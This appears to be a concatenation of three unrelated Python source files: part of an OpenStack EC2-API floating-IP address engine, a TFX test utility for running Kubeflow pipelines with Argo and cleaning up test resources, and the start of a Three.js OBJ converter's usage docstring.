'instance-id': 'instanceId',
'network-interface-id': 'networkInterfaceId',
'network-interface-owner-id': 'networkInterfaceOwnerId',
'private-ip-address': 'privateIpAddress',
'public-ip': 'publicIp'}
def __init__(self, os_ports, db_instances):
self.os_ports = os_ports
self.db_instances_dict = {i['os_id']: i for i in (db_instances or [])}
def format(self, item=None, os_item=None):
return _format_address(self.context, item, os_item, self.os_ports,
self.db_instances_dict)
def get_os_items(self):
return address_engine.get_os_floating_ips(self.context)
def auto_update_db(self, item, os_item):
item = super(AddressDescriber, self).auto_update_db(item, os_item)
if (item and 'network_interface_id' in item and
(not os_item.get('port_id') or
os_item['fixed_ip_address'] != item['private_ip_address'])):
_disassociate_address_item(self.context, item)
return item
def get_name(self, os_item):
return os_item['floating_ip_address']
def describe_addresses(context, public_ip=None, allocation_id=None,
filter=None):
formatted_addresses = AddressDescriber(
address_engine.get_os_ports(context),
db_api.get_items(context, 'i')).describe(
context, allocation_id, public_ip, filter)
return {'addressesSet': formatted_addresses}
def _format_address(context, address, os_floating_ip, os_ports=[],
db_instances_dict=None):
ec2_address = {'publicIp': os_floating_ip['floating_ip_address']}
fixed_ip_address = os_floating_ip.get('fixed_ip_address')
if fixed_ip_address:
ec2_address['privateIpAddress'] = fixed_ip_address
os_instance_id = _get_os_instance_id(context, os_floating_ip, os_ports)
if os_instance_id:
ec2_address['instanceId'] = (
_get_instance_ec2_id_by_os_id(context, os_instance_id,
db_instances_dict))
if not address:
ec2_address['domain'] = 'standard'
else:
ec2_address['domain'] = 'vpc'
ec2_address['allocationId'] = address['id']
if 'network_interface_id' in address:
ec2_address.update({
'associationId': ec2utils.change_ec2_id_kind(
ec2_address['allocationId'], 'eipassoc'),
'networkInterfaceId': address['network_interface_id'],
'networkInterfaceOwnerId': context.project_id})
return ec2_address
def _get_instance_ec2_id_by_os_id(context, os_instance_id, db_instances_dict):
db_item = ec2utils.get_db_item_by_os_id(context, 'i', os_instance_id,
db_instances_dict)
return db_item['id']
def _is_address_valid(context, neutron, address):
try:
neutron.show_floatingip(address['os_id'])
except neutron_exception.NotFound:
return False
else:
return True
def _associate_address_item(context, address, network_interface_id,
private_ip_address):
address['network_interface_id'] = network_interface_id
address['private_ip_address'] = private_ip_address
db_api.update_item(context, address)
def _disassociate_address_item(context, address):
address.pop('network_interface_id')
address.pop('private_ip_address')
db_api.update_item(context, address)
def _get_os_instance_id(context, os_floating_ip, os_ports=[]):
port_id = os_floating_ip.get('port_id')
os_instance_id = None
if port_id:
port = next((port for port in os_ports
if port['id'] == port_id), None)
if port and port.get('device_owner').startswith('compute:'):
os_instance_id = port.get('device_id')
return os_instance_id
class AddressEngineNeutron(object):
def allocate_address(self, context, domain=None):
os_public_network = ec2utils.get_os_public_network(context)
neutron = clients.neutron(context)
with common.OnCrashCleaner() as cleaner:
os_floating_ip = {'floating_network_id': os_public_network['id']}
try:
os_floating_ip = neutron.create_floatingip(
{'floatingip': os_floating_ip})
except neutron_exception.OverQuotaClient:
raise exception.AddressLimitExceeded()
os_floating_ip = os_floating_ip['floatingip']
if ((not domain or domain == 'standard') and
not CONF.disable_ec2_classic):
return None, os_floating_ip
cleaner.addCleanup(neutron.delete_floatingip, os_floating_ip['id'])
address = {'os_id': os_floating_ip['id'],
'public_ip': os_floating_ip['floating_ip_address']}
address = db_api.add_item(context, 'eipalloc', address)
return address, os_floating_ip
def release_address(self, context, public_ip, allocation_id):
neutron = clients.neutron(context)
if public_ip:
# TODO(ft): implement search in DB layer
address = next((addr for addr in
db_api.get_items(context, 'eipalloc')
if addr['public_ip'] == public_ip), None)
if address and _is_address_valid(context, neutron, address):
msg = _('You must specify an allocation id when releasing a '
'VPC elastic IP address')
raise exception.InvalidParameterValue(msg)
os_floating_ip = self.get_os_floating_ip_by_public_ip(context,
public_ip)
try:
neutron.delete_floatingip(os_floating_ip['id'])
except neutron_exception.NotFound:
pass
return
address = ec2utils.get_db_item(context, allocation_id)
if not _is_address_valid(context, neutron, address):
raise exception.InvalidAllocationIDNotFound(
id=allocation_id)
if 'network_interface_id' in address:
if CONF.disable_ec2_classic:
network_interface_id = address['network_interface_id']
network_interface = db_api.get_item_by_id(context,
network_interface_id)
default_vpc = ec2utils.check_and_create_default_vpc(context)
if default_vpc:
default_vpc_id = default_vpc['id']
if (network_interface and
network_interface['vpc_id'] == default_vpc_id):
association_id = ec2utils.change_ec2_id_kind(address['id'],
'eipassoc')
self.disassociate_address(
context, association_id=association_id)
else:
raise exception.InvalidIPAddressInUse(
ip_address=address['public_ip'])
else:
raise exception.InvalidIPAddressInUse(
ip_address=address['public_ip'])
with common.OnCrashCleaner() as cleaner:
db_api.delete_item(context, address['id'])
cleaner.addCleanup(db_api.restore_item, context,
'eipalloc', address)
try:
neutron.delete_floatingip(address['os_id'])
except neutron_exception.NotFound:
pass
def associate_address(self, context, public_ip=None, instance_id=None,
allocation_id=None, network_interface_id=None,
private_ip_address=None, allow_reassociation=False):
instance_network_interfaces = []
if instance_id:
# TODO(ft): implement search in DB layer
for eni in db_api.get_items(context, 'eni'):
if eni.get('instance_id') == instance_id:
instance_network_interfaces.append(eni)
neutron = clients.neutron(context)
if public_ip:
# TODO(ft): implement search in DB layer
address = next((addr for addr in db_api.get_items(context,
'eipalloc')
if addr['public_ip'] == public_ip), None)
if not CONF.disable_ec2_classic:
if instance_network_interfaces:
msg = _('You must specify an allocation id when mapping '
'an address to a VPC instance')
raise exception.InvalidParameterCombination(msg)
if address and _is_address_valid(context, neutron, address):
msg = _(
"The address '%(public_ip)s' does not belong to you.")
raise exception.AuthFailure(msg % {'public_ip': public_ip})
os_instance_id = ec2utils.get_db_item(context,
instance_id)['os_id']
# NOTE(ft): check the public IP exists to raise AWS exception
# otherwise
self.get_os_floating_ip_by_public_ip(context, public_ip)
nova = clients.nova(context)
nova.servers.add_floating_ip(os_instance_id, public_ip)
return None
if not address:
msg = _("The address '%(public_ip)s' does not belong to you.")
raise exception.AuthFailure(msg % {'public_ip': public_ip})
allocation_id = address['id']
if instance_id:
if not instance_network_interfaces:
# NOTE(ft): check the instance exists
ec2utils.get_db_item(context, instance_id)
msg = _('You must specify an IP address when mapping '
'to a non-VPC instance')
raise exception.InvalidParameterCombination(msg)
if len(instance_network_interfaces) > 1:
raise exception.InvalidInstanceId(instance_id=instance_id)
network_interface = instance_network_interfaces[0]
else:
network_interface = ec2utils.get_db_item(context,
network_interface_id)
if not private_ip_address:
private_ip_address = network_interface['private_ip_address']
address = ec2utils.get_db_item(context, allocation_id)
if not _is_address_valid(context, neutron, address):
raise exception.InvalidAllocationIDNotFound(
id=allocation_id)
if address.get('network_interface_id') == network_interface['id']:
# NOTE(ft): idempotent call
pass
elif address.get('network_interface_id') and not allow_reassociation:
msg = _('resource %(eipalloc_id)s is already associated with '
'associate-id %(eipassoc_id)s')
msg = msg % {'eipalloc_id': allocation_id,
'eipassoc_id': ec2utils.change_ec2_id_kind(
address['id'], 'eipassoc')}
raise exception.ResourceAlreadyAssociated(msg)
else:
internet_gateways = (
internet_gateway_api.describe_internet_gateways(
context,
filter=[{'name': 'attachment.vpc-id',
'value': [network_interface['vpc_id']]}])
['internetGatewaySet'])
if len(internet_gateways) == 0:
msg = _('Network %(vpc_id)s is not attached to any internet '
'gateway') % {'vpc_id': network_interface['vpc_id']}
raise exception.GatewayNotAttached(msg)
with common.OnCrashCleaner() as cleaner:
_associate_address_item(context, address,
network_interface['id'],
private_ip_address)
cleaner.addCleanup(_disassociate_address_item, context,
address)
os_floating_ip = {'port_id': network_interface['os_id'],
'fixed_ip_address': private_ip_address}
neutron.update_floatingip(address['os_id'],
{'floatingip': os_floating_ip})
# TODO(ft): generate unique association id for each act of association
return ec2utils.change_ec2_id_kind(address['id'], 'eipassoc')
def disassociate_address(self, context, public_ip=None,
association_id=None):
neutron = clients.neutron(context)
if public_ip:
# TODO(ft): implement search in DB layer
address = next((addr for addr in db_api.get_items(context,
'eipalloc')
if addr['public_ip'] == public_ip), None)
if not CONF.disable_ec2_classic:
if address and _is_address_valid(context, neutron, address):
msg = _('You must specify an association id when '
'unmapping an address from a VPC instance')
raise exception.InvalidParameterValue(msg)
# NOTE(tikitavi): check the public IP exists to raise AWS
# exception otherwise
os_floating_ip = self.get_os_floating_ip_by_public_ip(
context, public_ip)
os_ports = self.get_os_ports(context)
os_instance_id = _get_os_instance_id(context, os_floating_ip,
os_ports)
if os_instance_id:
nova = clients.nova(context)
nova.servers.remove_floating_ip(os_instance_id, public_ip)
return None
if not address:
msg = _("The address '%(public_ip)s' does not belong to you.")
raise exception.AuthFailure(msg % {'public_ip': public_ip})
if 'network_interface_id' not in address:
msg = _('You must specify an association id when unmapping '
'an address from a VPC instance')
raise exception.InvalidParameterValue(msg)
association_id = ec2utils.change_ec2_id_kind(address['id'],
'eipassoc')
address = db_api.get_item_by_id(
context, ec2utils.change_ec2_id_kind(association_id, 'eipalloc'))
if address is None or not _is_address_valid(context, neutron, address):
raise exception.InvalidAssociationIDNotFound(
id=association_id)
if 'network_interface_id' in address:
with common.OnCrashCleaner() as cleaner:
network_interface_id = address['network_interface_id']
private_ip_address = address['private_ip_address']
_disassociate_address_item(context, address)
cleaner.addCleanup(_associate_address_item, context, address,
network_interface_id, private_ip_address)
neutron.update_floatingip(address['os_id'],
{'floatingip': {'port_id': None}})
def get_os_floating_ips(self, context):
neutron = clients.neutron(context)
return neutron.list_floatingips(
tenant_id=context.project_id)['floatingips']
def get_os_ports(self, context):
neutron = clients.neutron(context)
return neutron.list_ports(tenant_id=context.project_id)['ports']
def get_os_floating_ip_by_public_ip(self, context, public_ip):
os_floating_ip = next((addr for addr in
self.get_os_floating_ips(context)
if addr['floating_ip_address'] == public_ip),
None)
if not os_floating_ip:
msg = _("The address '%(public_ip)s' does not belong to you.")
raise exception.AuthFailure(msg % {'public_ip': public_ip})
return os_floating_ip
address_engine = get_address_engine()
| |
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utility for testing Kubeflow-based orchestrator."""
import datetime
import json
import os
import re
import subprocess
import tarfile
import time
from typing import Any, Dict, List, Optional
from absl import logging
import kfp
from kfp_server_api import rest
import tensorflow_model_analysis as tfma
from tfx.components import CsvExampleGen
from tfx.components import Evaluator
from tfx.components import ExampleValidator
from tfx.components import InfraValidator
from tfx.components import Pusher
from tfx.components import SchemaGen
from tfx.components import StatisticsGen
from tfx.components import Trainer
from tfx.components import Transform
from tfx.dsl.component.experimental import executor_specs
from tfx.dsl.components.base.base_component import BaseComponent
from tfx.dsl.components.common import resolver
from tfx.dsl.input_resolution.strategies import latest_artifact_strategy
from tfx.dsl.io import fileio
from tfx.dsl.placeholder import placeholder as ph
from tfx.orchestration import pipeline as tfx_pipeline
from tfx.orchestration import test_utils
from tfx.orchestration.kubeflow import kubeflow_dag_runner
from tfx.orchestration.kubeflow.proto import kubeflow_pb2
from tfx.proto import infra_validator_pb2
from tfx.proto import pusher_pb2
from tfx.proto import trainer_pb2
from tfx.types import Channel
from tfx.types import channel_utils
from tfx.types import component_spec
from tfx.types import standard_artifacts
from tfx.types.standard_artifacts import Model
from tfx.utils import docker_utils
from tfx.utils import io_utils
from tfx.utils import kube_utils
from tfx.utils import retry
from tfx.utils import test_case_utils
# TODO(jiyongjung): Merge with kube_utils.PodStatus
# Various execution status of a KFP pipeline.
KFP_RUNNING_STATUS = 'running'
KFP_SUCCESS_STATUS = 'succeeded'
KFP_FAIL_STATUS = 'failed'
KFP_SKIPPED_STATUS = 'skipped'
KFP_ERROR_STATUS = 'error'
KFP_FINAL_STATUS = frozenset(
(KFP_SUCCESS_STATUS, KFP_FAIL_STATUS, KFP_SKIPPED_STATUS, KFP_ERROR_STATUS))
def poll_kfp_with_retry(host: str, run_id: str, retry_limit: int,
timeout: datetime.timedelta,
polling_interval: int) -> str:
"""Gets the pipeline execution status by polling KFP at the specified host.
Args:
host: address of the KFP deployment.
run_id: id of the execution of the pipeline.
retry_limit: number of retries that will be performed before raise an error.
timeout: timeout of this long-running operation, in timedelta.
polling_interval: interval between two consecutive polls, in seconds.
Returns:
The final status of the execution. Possible value can be found at
https://github.com/kubeflow/pipelines/blob/master/backend/api/run.proto#L254
Raises:
RuntimeError: if polling failed for retry_limit times consecutively.
"""
start_time = datetime.datetime.now()
retry_count = 0
while True:
# TODO(jxzheng): workaround for 1hr timeout limit in kfp.Client().
# This should be changed after
# https://github.com/kubeflow/pipelines/issues/3630 is fixed.
# Currently gcloud authentication token has a 1-hour expiration by default
# but kfp.Client() does not have a refreshing mechanism in place. This
# causes failure when attempting to get running status for a long pipeline
# execution (> 1 hour).
# Instead of implementing a whole authentication refreshing mechanism
# here, we chose re-creating kfp.Client() frequently to make sure the
# authentication does not expire. This is based on the fact that
# kfp.Client() is very light-weight.
# See more details at
# https://github.com/kubeflow/pipelines/issues/3630
client = kfp.Client(host=host)
# TODO(b/156784019): workaround the known issue at b/156784019 and
# https://github.com/kubeflow/pipelines/issues/3669
# by wait-and-retry when ApiException is hit.
try:
get_run_response = client.get_run(run_id=run_id)
except rest.ApiException as api_err:
# If get_run failed with ApiException, wait _POLLING_INTERVAL and retry.
if retry_count < retry_limit:
retry_count += 1
logging.info('API error %s was hit. Retrying: %s / %s.', api_err,
retry_count, retry_limit)
time.sleep(polling_interval)
continue
raise RuntimeError('Still hit remote error after %s retries: %s' %
(retry_limit, api_err))
else:
# If get_run succeeded, reset retry_count.
retry_count = 0
if (get_run_response and get_run_response.run and
get_run_response.run.status and
get_run_response.run.status.lower() in KFP_FINAL_STATUS):
# Return because final status is reached.
return get_run_response.run.status
if datetime.datetime.now() - start_time > timeout:
# Timeout.
raise RuntimeError('Waiting for run timeout at %s' %
datetime.datetime.now().strftime('%H:%M:%S'))
logging.info('Waiting for the job to complete...')
time.sleep(polling_interval)
def print_failure_log_for_run(host: str, run_id: str, namespace: str):
"""Prints logs of failed components of a run.
Prints execution logs for failed componentsusing `logging.info`.
This resembles the behavior of `argo logs` but uses K8s API directly.
Don't print anything if the run was successful.
Args:
host: address of the KFP deployment.
run_id: id of the execution of the pipeline.
namespace: namespace of K8s cluster.
"""
client = kfp.Client(host=host)
run = client.get_run(run_id=run_id)
workflow_manifest = json.loads(run.pipeline_runtime.workflow_manifest)
if kube_utils.PodPhase(
workflow_manifest['status']['phase']) != kube_utils.PodPhase.FAILED:
return
k8s_client = kube_utils.make_core_v1_api()
pods = [i for i in workflow_manifest['status']['nodes'] if i['type'] == 'Pod']
for pod in pods:
if kube_utils.PodPhase(pod['phase']) != kube_utils.PodPhase.FAILED:
continue
display_name = pod['displayName']
pod_id = pod['id']
log = k8s_client.read_namespaced_pod_log(
pod_id, namespace=namespace, container='main')
for line in log.splitlines():
logging.info('%s:%s', display_name, line)
# Custom component definitions for testing purpose.
class _HelloWorldSpec(component_spec.ComponentSpec):
INPUTS = {}
OUTPUTS = {
'greeting':
component_spec.ChannelParameter(type=standard_artifacts.String)
}
PARAMETERS = {
'word': component_spec.ExecutionParameter(type=str),
}
class _ByeWorldSpec(component_spec.ComponentSpec):
INPUTS = {
'hearing': component_spec.ChannelParameter(type=standard_artifacts.String)
}
OUTPUTS = {}
PARAMETERS = {}
class HelloWorldComponent(BaseComponent):
"""Producer component."""
SPEC_CLASS = _HelloWorldSpec
EXECUTOR_SPEC = executor_specs.TemplatedExecutorContainerSpec(
# TODO(b/143965964): move the image to private repo if the test is flaky
# due to docker hub.
image='gcr.io/google.com/cloudsdktool/cloud-sdk:latest',
command=['sh', '-c'],
args=[
'echo "hello ' +
ph.exec_property('word') +
'" | gsutil cp - ' +
ph.output('greeting')[0].uri
])
def __init__(self, word, greeting=None):
if not greeting:
artifact = standard_artifacts.String()
greeting = channel_utils.as_channel([artifact])
super().__init__(_HelloWorldSpec(word=word, greeting=greeting))
class ByeWorldComponent(BaseComponent):
"""Consumer component."""
SPEC_CLASS = _ByeWorldSpec
EXECUTOR_SPEC = executor_specs.TemplatedExecutorContainerSpec(
image='bash:latest',
command=['echo'],
args=['received ' + ph.input('hearing')[0].value])
def __init__(self, hearing):
super().__init__(_ByeWorldSpec(hearing=hearing))
def create_primitive_type_components(pipeline_name: str) -> List[BaseComponent]:
"""Creates components for testing primitive type artifact passing.
Args:
pipeline_name: Name of this pipeline.
Returns:
A list of TFX custom container components.
"""
hello_world = HelloWorldComponent(word=pipeline_name)
bye_world = ByeWorldComponent(hearing=hello_world.outputs['greeting'])
return [hello_world, bye_world]
def create_e2e_components(
pipeline_root: str,
csv_input_location: str,
transform_module: str,
trainer_module: str,
) -> List[BaseComponent]:
"""Creates components for a simple Chicago Taxi TFX pipeline for testing.
Args:
pipeline_root: The root of the pipeline output.
csv_input_location: The location of the input data directory.
transform_module: The location of the transform module file.
trainer_module: The location of the trainer module file.
Returns:
A list of TFX components that constitutes an end-to-end test pipeline.
"""
example_gen = CsvExampleGen(input_base=csv_input_location)
statistics_gen = StatisticsGen(examples=example_gen.outputs['examples'])
schema_gen = SchemaGen(statistics=statistics_gen.outputs['statistics'])
example_validator = ExampleValidator(
statistics=statistics_gen.outputs['statistics'],
schema=schema_gen.outputs['schema'])
transform = Transform(
examples=example_gen.outputs['examples'],
schema=schema_gen.outputs['schema'],
module_file=transform_module)
latest_model_resolver = resolver.Resolver(
strategy_class=latest_artifact_strategy.LatestArtifactStrategy,
latest_model=Channel(type=Model)).with_id('latest_model_resolver')
trainer = Trainer(
transformed_examples=transform.outputs['transformed_examples'],
schema=schema_gen.outputs['schema'],
base_model=latest_model_resolver.outputs['latest_model'],
transform_graph=transform.outputs['transform_graph'],
train_args=trainer_pb2.TrainArgs(num_steps=10),
eval_args=trainer_pb2.EvalArgs(num_steps=5),
module_file=trainer_module,
)
# Set the TFMA config for Model Evaluation and Validation.
eval_config = tfma.EvalConfig(
model_specs=[tfma.ModelSpec(signature_name='eval')],
metrics_specs=[
tfma.MetricsSpec(
metrics=[tfma.MetricConfig(class_name='ExampleCount')],
thresholds={
'accuracy':
tfma.MetricThreshold(
value_threshold=tfma.GenericValueThreshold(
lower_bound={'value': 0.5}),
change_threshold=tfma.GenericChangeThreshold(
direction=tfma.MetricDirection.HIGHER_IS_BETTER,
absolute={'value': -1e-10}))
})
],
slicing_specs=[
tfma.SlicingSpec(),
tfma.SlicingSpec(feature_keys=['trip_start_hour'])
])
evaluator = Evaluator(
examples=example_gen.outputs['examples'],
model=trainer.outputs['model'],
eval_config=eval_config)
infra_validator = InfraValidator(
model=trainer.outputs['model'],
examples=example_gen.outputs['examples'],
serving_spec=infra_validator_pb2.ServingSpec(
tensorflow_serving=infra_validator_pb2.TensorFlowServing(
tags=['latest']),
kubernetes=infra_validator_pb2.KubernetesConfig()),
request_spec=infra_validator_pb2.RequestSpec(
tensorflow_serving=infra_validator_pb2.TensorFlowServingRequestSpec())
)
pusher = Pusher(
model=trainer.outputs['model'],
model_blessing=evaluator.outputs['blessing'],
push_destination=pusher_pb2.PushDestination(
filesystem=pusher_pb2.PushDestination.Filesystem(
base_directory=os.path.join(pipeline_root, 'model_serving'))))
return [
example_gen,
statistics_gen,
schema_gen,
example_validator,
transform,
latest_model_resolver,
trainer,
evaluator,
infra_validator,
pusher,
]
@retry.retry(ignore_eventual_failure=True)
def delete_ai_platform_model(model_name):
"""Delete pushed model with the given name in AI Platform."""
# In order to delete model, all versions in the model must be deleted first.
versions_command = ('gcloud', 'ai-platform', 'versions', 'list',
'--model={}'.format(model_name), '--region=global')
# The return code of the following subprocess call will be explicitly checked
# using the logic below, so we don't need to call check_output().
versions = subprocess.run(versions_command, stdout=subprocess.PIPE) # pylint: disable=subprocess-run-check
if versions.returncode == 0:
logging.info('Model %s has versions %s', model_name, versions.stdout)
# The first stdout line is headers, ignore. The columns are
# [NAME] [DEPLOYMENT_URI] [STATE]
#
# By specification of test case, the last version in the output list is the
# default version, which will be deleted last in the for loop, so there's no
# special handling needed hear.
# The operation setting default version is at
# https://github.com/tensorflow/tfx/blob/65633c772f6446189e8be7c6332d32ea221ff836/tfx/extensions/google_cloud_ai_platform/runner.py#L309
for version in versions.stdout.decode('utf-8').strip('\n').split('\n')[1:]:
version = version.split()[0]
logging.info('Deleting version %s of model %s', version, model_name)
version_delete_command = ('gcloud', '--quiet', 'ai-platform', 'versions',
'delete', version,
'--model={}'.format(model_name),
'--region=global')
subprocess.run(version_delete_command, check=True)
logging.info('Deleting model %s', model_name)
subprocess.run(('gcloud', '--quiet', 'ai-platform', 'models', 'delete',
model_name, '--region=global'),
check=True)
class BaseKubeflowTest(test_case_utils.TfxTest):
"""Base class that defines testing harness for pipeline on KubeflowRunner."""
_POLLING_INTERVAL_IN_SECONDS = 10
# The following environment variables need to be set prior to calling the test
# in this file. All variables are required and do not have a default.
# The base container image name to use when building the image used in tests.
_BASE_CONTAINER_IMAGE = os.environ['KFP_E2E_BASE_CONTAINER_IMAGE']
# The src path to use to build docker image
_REPO_BASE = os.environ['KFP_E2E_SRC']
# The project id to use to run tests.
_GCP_PROJECT_ID = os.environ['KFP_E2E_GCP_PROJECT_ID']
# The GCP region in which the end-to-end test is run.
_GCP_REGION = os.environ['KFP_E2E_GCP_REGION']
# The GCP bucket to use to write output artifacts.
_BUCKET_NAME = os.environ['KFP_E2E_BUCKET_NAME']
# The location of test data. The input files are copied to a test-local
# location for each invocation, and cleaned up at the end of test.
_TEST_DATA_ROOT = os.environ['KFP_E2E_TEST_DATA_ROOT']
# The location of test user module. Will be packaged and copied to under the
# pipeline root before pipeline execution.
_MODULE_ROOT = os.path.join(
os.path.dirname(os.path.dirname(os.path.dirname(__file__))),
'components/testdata/module_file')
@classmethod
def setUpClass(cls):
super(BaseKubeflowTest, cls).setUpClass()
if ':' not in cls._BASE_CONTAINER_IMAGE:
# Generate base container image for the test if tag is not specified.
cls.container_image = '{}:{}'.format(cls._BASE_CONTAINER_IMAGE,
test_utils.random_id())
# Create a container image for use by test pipelines.
test_utils.build_and_push_docker_image(cls.container_image,
cls._REPO_BASE)
else: # Use the given image as a base image.
cls.container_image = cls._BASE_CONTAINER_IMAGE
@classmethod
def tearDownClass(cls):
super(BaseKubeflowTest, cls).tearDownClass()
if cls.container_image != cls._BASE_CONTAINER_IMAGE:
# Delete container image used in tests.
logging.info('Deleting image %s', cls.container_image)
docker_utils.delete_image(cls.container_image)
def setUp(self):
super().setUp()
self._test_dir = self.tmp_dir
self.enter_context(test_case_utils.change_working_dir(self.tmp_dir))
self._test_output_dir = 'gs://{}/test_output'.format(self._BUCKET_NAME)
test_id = test_utils.random_id()
self._testdata_root = 'gs://{}/test_data/{}'.format(self._BUCKET_NAME,
test_id)
io_utils.copy_dir(self._TEST_DATA_ROOT, self._testdata_root)
self._data_root = os.path.join(self._testdata_root, 'external', 'csv')
self._transform_module = os.path.join(self._MODULE_ROOT,
'transform_module.py')
self._trainer_module = os.path.join(self._MODULE_ROOT, 'trainer_module.py')
self._serving_model_dir = os.path.join(self._testdata_root, 'output')
self.addCleanup(self._delete_test_dir, test_id)
@retry.retry(ignore_eventual_failure=True)
def _delete_test_dir(self, test_id: str):
"""Deletes files for this test including the module file and data files."""
logging.info('Deleting test data: %s', self._testdata_root)
io_utils.delete_dir(self._testdata_root)
@retry.retry(ignore_eventual_failure=True)
def _delete_workflow(self, workflow_name: str):
"""Deletes the specified Argo workflow."""
logging.info('Deleting workflow %s', workflow_name)
subprocess.run(['argo', '--namespace', 'kubeflow', 'delete', workflow_name],
check=True)
def _run_workflow(self,
workflow_file: str,
workflow_name: str,
parameter: Dict[str, str] = None):
"""Runs the specified workflow with Argo.
Blocks until the workflow has run (successfully or not) to completion.
Args:
workflow_file: YAML file with Argo workflow spec for the pipeline.
workflow_name: Name to use for the workflow.
parameter: mapping from pipeline parameter name to its runtime value.
"""
# TODO(ajaygopinathan): Consider using KFP cli instead.
def _format_parameter(parameter: Dict[str, Any]) -> List[str]:
"""Format the pipeline parameter section of argo workflow."""
if parameter:
result = []
for k, v in parameter.items():
result.append('-p')
result.append('{}={}'.format(k, v))
return result
else:
return []
run_command = [
'argo',
'submit',
'--name',
workflow_name,
'--namespace',
'kubeflow',
'--serviceaccount',
'pipeline-runner',
workflow_file,
]
run_command += _format_parameter(parameter)
logging.info('Launching workflow %s with parameter %s', workflow_name,
_format_parameter(parameter))
with test_utils.Timer('RunningPipelineToCompletion'):
subprocess.run(run_command, check=True)
# Wait in the loop while pipeline is pending or running state.
status = 'Pending'
while status in ('Pending', 'Running'):
time.sleep(self._POLLING_INTERVAL_IN_SECONDS)
status = self._get_argo_pipeline_status(workflow_name)
@retry.retry(ignore_eventual_failure=True)
def _delete_pipeline_output(self, pipeline_name: str):
"""Deletes output produced by the named pipeline."""
io_utils.delete_dir(self._pipeline_root(pipeline_name))
def _pipeline_root(self, pipeline_name: str):
return os.path.join(self._test_output_dir, pipeline_name)
def _create_pipeline(self, pipeline_name: str,
components: List[BaseComponent],
beam_pipeline_args: Optional[List[str]] = None):
"""Creates a pipeline given name and list of components."""
return tfx_pipeline.Pipeline(
pipeline_name=pipeline_name,
pipeline_root=self._pipeline_root(pipeline_name),
components=components,
enable_cache=True,
beam_pipeline_args=beam_pipeline_args,
)
def _create_dataflow_pipeline(self,
pipeline_name: str,
components: List[BaseComponent],
wait_until_finish_ms: int = 1000 * 60 * 20):
"""Creates a pipeline with Beam DataflowRunner."""
beam_pipeline_args = [
'--runner=TestDataflowRunner',
'--wait_until_finish_duration=%d' % wait_until_finish_ms,
'--project=' + self._GCP_PROJECT_ID,
'--temp_location=' +
os.path.join(self._pipeline_root(pipeline_name), 'tmp'),
'--region=' + self._GCP_REGION,
# TODO(b/171733562): Remove `use_runner_v2` once it is the default for
# Dataflow.
'--experiments=use_runner_v2',
]
return self._create_pipeline(
pipeline_name, components, beam_pipeline_args=beam_pipeline_args)
def _get_kubeflow_metadata_config(
self) -> kubeflow_pb2.KubeflowMetadataConfig:
config = kubeflow_dag_runner.get_default_kubeflow_metadata_config()
return config
def _get_argo_pipeline_status(self, workflow_name: str) -> str:
"""Get Pipeline status.
Args:
workflow_name: The name of the workflow.
Returns:
Simple status string which is returned from `argo get` command.
"""
get_workflow_command = [
'argo', '--namespace', 'kubeflow', 'get', workflow_name
]
output = subprocess.check_output(get_workflow_command).decode('utf-8')
logging.info('Argo output ----\n%s', output)
match = re.search(r'^Status:\s+(.+)$', output, flags=re.MULTILINE)
self.assertIsNotNone(match)
return match.group(1)
def _compile_and_run_pipeline(self,
pipeline: tfx_pipeline.Pipeline,
workflow_name: str = None,
parameters: Dict[str, Any] = None):
"""Compiles and runs a KFP pipeline.
Args:
pipeline: The logical pipeline to run.
workflow_name: The argo workflow name, default to pipeline name.
parameters: Value of runtime paramters of the pipeline.
"""
pipeline_name = pipeline.pipeline_info.pipeline_name
config = kubeflow_dag_runner.KubeflowDagRunnerConfig(
kubeflow_metadata_config=self._get_kubeflow_metadata_config(),
tfx_image=self.container_image)
kubeflow_dag_runner.KubeflowDagRunner(config=config).run(pipeline)
file_path = os.path.join(self._test_dir, '{}.tar.gz'.format(pipeline_name))
self.assertTrue(fileio.exists(file_path))
tarfile.TarFile.open(file_path).extract('pipeline.yaml')
pipeline_file = os.path.join(self._test_dir, 'pipeline.yaml')
self.assertIsNotNone(pipeline_file)
workflow_name = workflow_name or pipeline_name
# Ensure cleanup regardless of whether pipeline succeeds or fails.
self.addCleanup(self._delete_workflow, workflow_name)
self.addCleanup(self._delete_pipeline_output, pipeline_name)
# Run the pipeline to completion.
self._run_workflow(pipeline_file, workflow_name, parameters)
# Obtain workflow logs.
get_logs_command = [
'argo', '--namespace', 'kubeflow', 'logs', '-w', workflow_name
]
logs_output = subprocess.check_output(get_logs_command).decode('utf-8')
# Check if pipeline completed successfully.
status = self._get_argo_pipeline_status(workflow_name)
self.assertEqual(
'Succeeded', status, 'Pipeline {} failed to complete successfully: {}'
'\nFailed workflow logs:\n{}'.format(pipeline_name, status,
logs_output))
| |
"""Convert Wavefront OBJ / MTL files into Three.js (JSON model version, to be used with ascii / binary loader)
-------------------------
How to use this converter
-------------------------
python convert_obj_three.py -i infile.obj -o outfile.js [-m "morphfiles*.obj"] [-c "morphcolors*.obj"] [-a center|centerxz|top|bottom|none] [-s smooth|flat] [-t ascii|binary] [-d invert|normal] [-b] [-e]
Notes:
- flags
-i infile.obj input OBJ file
-o outfile.js output JS file
-m "morphfiles*.obj" morph OBJ files (can use wildcards, enclosed in quotes multiple patterns separate by space)
-c "morphcolors*.obj" morph colors OBJ files (can use wildcards, enclosed in quotes multiple patterns separate by space)
-a center|centerxz|top|bottom|none model alignment
-s smooth|flat smooth = export vertex normals, flat = no normals (face normals computed in loader)
-t ascii|binary export ascii or binary format (ascii has more features, binary just supports vertices, faces, normals, uvs and materials)
-d invert|normal invert transparency
-b bake material colors into face colors
-x 10.0 scale and truncate
-f 2 morph frame sampling step
- by default:
use smooth shading (if there were vertex normals in the original model)
will be in ASCII format
original model is assumed to use non-inverted transparency / dissolve (0.0 fully transparent, 1.0 fully opaque)
no face colors baking
no scale and truncate
morph frame step = 1 (all files will be processed)
- binary conversion will create two files:
outfile.js (materials)
outfile.bin (binary buffers)
--------------------------------------------------
How to use generated JS file in your HTML document
--------------------------------------------------
<script type="text/javascript" src="Three.js"></script>
...
<script type="text/javascript">
...
// load ascii model
var jsonLoader = new THREE.JSONLoader();
